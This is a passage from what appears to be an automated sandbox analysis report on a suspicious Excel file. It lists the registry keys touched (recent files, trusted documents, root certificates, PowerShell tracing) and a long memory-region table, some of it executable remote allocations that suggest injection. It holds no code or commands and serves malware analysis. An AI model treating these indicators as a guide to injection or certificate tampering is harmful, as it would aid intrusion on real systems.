Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\353F9
|
353F9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35560
|
35560
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35F6E
|
35F6E
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35560
|
35560
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 80 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
547000
|
heap
|
page read and write
|
||
|
3C4E000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
52B000
|
heap
|
page read and write
|
||
|
1AB90000
|
heap
|
page read and write
|
||
|
357F000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
1CB1E000
|
stack
|
page read and write
|
||
|
14D000
|
heap
|
page read and write
|
||
|
2955000
|
trusted library allocation
|
page read and write
|
||
|
609000
|
heap
|
page read and write
|
||
|
4B87000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
4F7F000
|
heap
|
page read and write
|
||
|
125000
|
heap
|
page read and write
|
||
|
2C0000
|
trusted library allocation
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
3BAF000
|
heap
|
page read and write
|
||
|
51B0000
|
heap
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
1A190000
|
heap
|
page read and write
|
||
|
4F92000
|
heap
|
page read and write
|
||
|
1B80000
|
heap
|
page read and write
|
||
|
1D94000
|
heap
|
page read and write
|
||
|
5B5000
|
heap
|
page read and write
|
||
|
7FE898D2000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
389F000
|
stack
|
page read and write
|
||
|
130000
|
direct allocation
|
page read and write
|
||
|
D3000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
3C34000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
3579000
|
trusted library allocation
|
page read and write
|
||
|
5FA000
|
heap
|
page read and write
|
||
|
4D06000
|
heap
|
page read and write
|
||
|
4F78000
|
heap
|
page read and write
|
||
|
1E24000
|
heap
|
page read and write
|
||
|
246000
|
stack
|
page read and write
|
||
|
4A68000
|
heap
|
page read and write
|
||
|
4190000
|
trusted library allocation
|
page read and write
|
||
|
15C000
|
stack
|
page read and write
|
||
|
1AB9D000
|
heap
|
page read and write
|
||
|
1A8A4000
|
heap
|
page execute and read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
1A1CE000
|
heap
|
page read and write
|
||
|
4E30000
|
heap
|
page read and write
|
||
|
1D56000
|
heap
|
page read and write
|
||
|
615000
|
heap
|
page read and write
|
||
|
5A9000
|
heap
|
page read and write
|
||
|
26A3000
|
trusted library allocation
|
page read and write
|
||
|
1B6000
|
heap
|
page read and write
|
||
|
41E000
|
heap
|
page read and write
|
||
|
4380000
|
trusted library allocation
|
page read and write
|
||
|
2F1000
|
stack
|
page read and write
|
||
|
451F000
|
stack
|
page read and write
|
||
|
4DB7000
|
heap
|
page read and write
|
||
|
1F6F000
|
stack
|
page read and write
|
||
|
4F9B000
|
heap
|
page read and write
|
||
|
1AC19000
|
heap
|
page read and write
|
||
|
2CC000
|
heap
|
page read and write
|
||
|
7FE899C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
D3000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
359F000
|
trusted library allocation
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
5A9000
|
heap
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
274D000
|
trusted library allocation
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
48F000
|
direct allocation
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
3BE5000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
7FE89AB2000
|
trusted library allocation
|
page read and write
|
||
|
44D000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3580000
|
trusted library allocation
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
BA000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
3B3000
|
heap
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
1D70000
|
direct allocation
|
page read and write
|
||
|
3A9D000
|
stack
|
page read and write
|
||
|
3BD6000
|
heap
|
page read and write
|
||
|
1D40000
|
heap
|
page execute and read and write
|
||
|
4F39000
|
heap
|
page read and write
|
||
|
1AEFE000
|
stack
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
3862000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
1B6000
|
heap
|
page read and write
|
||
|
496B000
|
trusted library allocation
|
page read and write
|
||
|
1A82D000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
3DB000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
30CC000
|
stack
|
page read and write
|
||
|
5202000
|
heap
|
page read and write
|
||
|
2297000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
4902000
|
heap
|
page read and write
|
||
|
3C90000
|
trusted library allocation
|
page read and write
|
||
|
81AE000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB000
|
stack
|
page read and write
|
||
|
22E9000
|
trusted library allocation
|
page read and write
|
||
|
3C4A000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
27D0000
|
trusted library allocation
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4B84000
|
heap
|
page read and write
|
||
|
3598000
|
trusted library allocation
|
page read and write
|
||
|
1C8EB000
|
stack
|
page read and write
|
||
|
1FD3000
|
direct allocation
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
365000
|
heap
|
page read and write
|
||
|
3587000
|
trusted library allocation
|
page read and write
|
||
|
1B90000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
4902000
|
heap
|
page read and write
|
||
|
1FC7000
|
direct allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
1C3D3000
|
heap
|
page read and write
|
||
|
3BAF000
|
heap
|
page read and write
|
||
|
4FD1000
|
heap
|
page read and write
|
||
|
1B555000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
393000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
3C2E000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
55B000
|
heap
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
3C4D000
|
heap
|
page read and write
|
||
|
577000
|
heap
|
page read and write
|
||
|
2A4F000
|
stack
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
3C4A000
|
heap
|
page read and write
|
||
|
7FE89A97000
|
trusted library allocation
|
page read and write
|
||
|
7FE899F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
4F9B000
|
heap
|
page read and write
|
||
|
4900000
|
heap
|
page read and write
|
||
|
496A000
|
trusted library allocation
|
page read and write
|
||
|
1AB000
|
heap
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
7FE89990000
|
trusted library allocation
|
page execute and read and write
|
||
|
2299000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
1AF50000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
1FE0000
|
heap
|
page execute and read and write
|
||
|
51F8000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
484E000
|
trusted library allocation
|
page read and write
|
||
|
1C14B000
|
heap
|
page read and write
|
||
|
32D000
|
heap
|
page read and write
|
||
|
4F31000
|
heap
|
page read and write
|
||
|
7FE89AE4000
|
trusted library allocation
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
1A750000
|
heap
|
page execute and read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
1E53000
|
direct allocation
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
4E27000
|
heap
|
page read and write
|
||
|
7FE899F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
490000
|
direct allocation
|
page read and write
|
||
|
419000
|
heap
|
page read and write
|
||
|
1BFF5000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
3C3B000
|
heap
|
page read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
4D1F000
|
heap
|
page read and write
|
||
|
14E000
|
heap
|
page read and write
|
||
|
4A5E000
|
heap
|
page read and write
|
||
|
1A73F000
|
stack
|
page read and write
|
||
|
1BE88000
|
stack
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
1C84A000
|
stack
|
page read and write
|
||
|
77AE000
|
trusted library allocation
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
398000
|
heap
|
page read and write
|
||
|
1A75F000
|
stack
|
page read and write
|
||
|
7FE89AB4000
|
trusted library allocation
|
page read and write
|
||
|
63AE000
|
trusted library allocation
|
page read and write
|
||
|
18F000
|
heap
|
page read and write
|
||
|
3C30000
|
heap
|
page read and write
|
||
|
2978000
|
trusted library allocation
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page read and write
|
||
|
57E000
|
heap
|
page read and write
|
||
|
1BA0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
4CCD000
|
heap
|
page read and write
|
||
|
1CD0000
|
heap
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
185000
|
stack
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page read and write
|
||
|
210000
|
trusted library allocation
|
page read and write
|
||
|
4670000
|
trusted library allocation
|
page read and write
|
||
|
1DFE000
|
stack
|
page read and write | page guard
|
||
|
4F67000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
4F71000
|
heap
|
page read and write
|
||
|
D0000
|
heap
|
page read and write
|
||
|
2176000
|
trusted library allocation
|
page read and write
|
||
|
1DD000
|
heap
|
page read and write
|
||
|
51F0000
|
heap
|
page read and write
|
||
|
1B45B000
|
stack
|
page read and write
|
||
|
49B000
|
remote allocation
|
page execute and read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
4F87000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
3FCA000
|
stack
|
page read and write
|
||
|
38BE000
|
heap
|
page read and write
|
||
|
273A000
|
trusted library allocation
|
page read and write
|
||
|
1AA15000
|
stack
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4DF8000
|
heap
|
page read and write
|
||
|
359E000
|
trusted library allocation
|
page read and write
|
||
|
1C3FE000
|
heap
|
page read and write
|
||
|
3C4000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
48F8000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
8BAE000
|
trusted library allocation
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
1AB56000
|
heap
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
4B96000
|
heap
|
page read and write
|
||
|
2C7000
|
heap
|
page read and write
|
||
|
38BA000
|
heap
|
page read and write
|
||
|
2975000
|
trusted library allocation
|
page read and write
|
||
|
1A268000
|
heap
|
page read and write
|
||
|
3867000
|
heap
|
page read and write
|
||
|
4E27000
|
heap
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
1C3C0000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
1E53000
|
direct allocation
|
page read and write
|
||
|
3579000
|
trusted library allocation
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
7FE89A83000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2D4000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
1B234000
|
heap
|
page read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
1ABC3000
|
heap
|
page read and write
|
||
|
35D000
|
heap
|
page read and write
|
||
|
1E40000
|
direct allocation
|
page read and write
|
||
|
2BC000
|
stack
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
7FE89A87000
|
trusted library allocation
|
page read and write
|
||
|
36A1000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
C8000
|
heap
|
page read and write
|
||
|
35AA000
|
trusted library allocation
|
page read and write
|
||
|
3C39000
|
heap
|
page read and write
|
||
|
3C32000
|
heap
|
page read and write
|
||
|
2AE0000
|
trusted library allocation
|
page execute read
|
||
|
35F000
|
heap
|
page read and write
|
||
|
1FA0000
|
direct allocation
|
page read and write
|
||
|
4D03000
|
heap
|
page read and write
|
||
|
1C99C000
|
stack
|
page read and write
|
||
|
1B2C0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4F68000
|
heap
|
page read and write
|
||
|
3818000
|
heap
|
page read and write
|
||
|
48FA000
|
heap
|
page read and write
|
||
|
122A1000
|
trusted library allocation
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
39E0000
|
trusted library allocation
|
page read and write
|
||
|
1FA000
|
heap
|
page read and write
|
||
|
1A080000
|
heap
|
page read and write
|
||
|
4AAD000
|
heap
|
page read and write
|
||
|
2680000
|
heap
|
page read and write
|
||
|
1A26B000
|
heap
|
page read and write
|
||
|
297000
|
heap
|
page read and write
|
||
|
3BD2000
|
heap
|
page read and write
|
||
|
2F0000
|
trusted library allocation
|
page read and write
|
||
|
455000
|
heap
|
page read and write
|
||
|
2121000
|
trusted library allocation
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
1E00000
|
heap
|
page execute and read and write
|
||
|
2EBF000
|
stack
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
459000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
520A000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
14D000
|
heap
|
page read and write
|
||
|
365C000
|
trusted library allocation
|
page read and write
|
||
|
4D75000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
9FAE000
|
trusted library allocation
|
page read and write
|
||
|
4F84000
|
heap
|
page read and write
|
||
|
4FAE000
|
trusted library allocation
|
page read and write
|
||
|
3D7E000
|
stack
|
page read and write
|
||
|
19C000
|
heap
|
page read and write
|
||
|
4F29000
|
heap
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
1B27C000
|
stack
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
495B000
|
stack
|
page read and write
|
||
|
1DD000
|
heap
|
page read and write
|
||
|
5D7000
|
heap
|
page read and write
|
||
|
194000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
1BE0000
|
heap
|
page read and write
|
||
|
3C3B000
|
heap
|
page read and write
|
||
|
1C1AE000
|
stack
|
page read and write
|
||
|
4F9B000
|
heap
|
page read and write
|
||
|
1272000
|
unkown
|
page execute read
|
||
|
935000
|
heap
|
page read and write
|
||
|
5375000
|
heap
|
page read and write
|
||
|
3C26000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
371000
|
heap
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page read and write
|
||
|
3C4A000
|
heap
|
page read and write
|
||
|
618000
|
heap
|
page read and write
|
||
|
7FE89A93000
|
trusted library allocation
|
page read and write
|
||
|
2974000
|
trusted library allocation
|
page read and write
|
||
|
2681000
|
trusted library allocation
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4906000
|
heap
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
1B20000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
7FE898D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C158000
|
heap
|
page read and write
|
||
|
16A000
|
heap
|
page read and write
|
||
|
1E20000
|
direct allocation
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
7FE89BCE000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
20D7000
|
trusted library allocation
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
2391000
|
trusted library allocation
|
page read and write
|
||
|
2FF000
|
heap
|
page read and write
|
||
|
3829000
|
heap
|
page read and write
|
||
|
373000
|
heap
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
3BE5000
|
heap
|
page read and write
|
||
|
3BD5000
|
heap
|
page read and write
|
||
|
1A8A0000
|
heap
|
page execute and read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
4CFA000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
7FE898F0000
|
trusted library allocation
|
page read and write
|
||
|
1C2000
|
heap
|
page read and write
|
||
|
3818000
|
heap
|
page read and write
|
||
|
4AAD000
|
heap
|
page read and write
|
||
|
102000
|
stack
|
page read and write
|
||
|
470000
|
direct allocation
|
page read and write
|
||
|
36DC000
|
heap
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
95AE000
|
trusted library allocation
|
page read and write
|
||
|
7FE898DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A5C000
|
heap
|
page read and write
|
||
|
4BF9000
|
heap
|
page read and write
|
||
|
3C3B000
|
heap
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
26DD000
|
trusted library allocation
|
page read and write
|
||
|
59A000
|
heap
|
page read and write
|
||
|
2659000
|
heap
|
page read and write
|
||
|
1C418000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
455000
|
heap
|
page read and write
|
||
|
1B85000
|
heap
|
page read and write
|
||
|
45AE000
|
trusted library allocation
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
1BD6000
|
heap
|
page read and write
|
||
|
1B0000
|
direct allocation
|
page read and write
|
||
|
1F4000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
78000
|
heap
|
page read and write
|
||
|
21A000
|
heap
|
page read and write
|
||
|
4FCF000
|
heap
|
page read and write
|
||
|
1FA000
|
heap
|
page read and write
|
||
|
4968000
|
trusted library allocation
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
3598000
|
trusted library allocation
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
1AC13000
|
heap
|
page read and write
|
||
|
58B000
|
heap
|
page read and write
|
||
|
4902000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1C8000
|
heap
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
35A6000
|
trusted library allocation
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
51EF000
|
heap
|
page read and write
|
||
|
1AD000
|
direct allocation
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A8C000
|
